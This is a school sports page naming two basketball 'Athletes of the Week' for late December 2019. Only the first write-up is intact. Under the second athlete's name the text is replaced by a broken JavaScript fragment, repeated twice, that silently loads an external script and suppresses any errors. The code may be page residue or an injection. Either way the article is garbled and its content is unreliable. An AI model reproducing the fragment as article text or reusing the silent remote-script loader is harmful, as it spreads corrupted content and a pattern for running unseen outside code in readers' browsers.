Athletes of the Week
Kemba Credit Union Athletes of the Week 12/23/2019-12/29/2019
Nathan Dudukovich
Freshman, Boys Basketball
Nathan scored a personal best 15 points in West’s win over Farrell, Pa. on Saturday topping his previous high of 11 points in the win over Fairborn last Saturday. He is the second Lakota West freshman on a boys team to register double figure single game scoring totals and the first since current National Football League standout Jordan Hicks did it on multiple occasions during the 2006-07 basketball season.
Neveah Dean
Senior, Girls Basketball
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();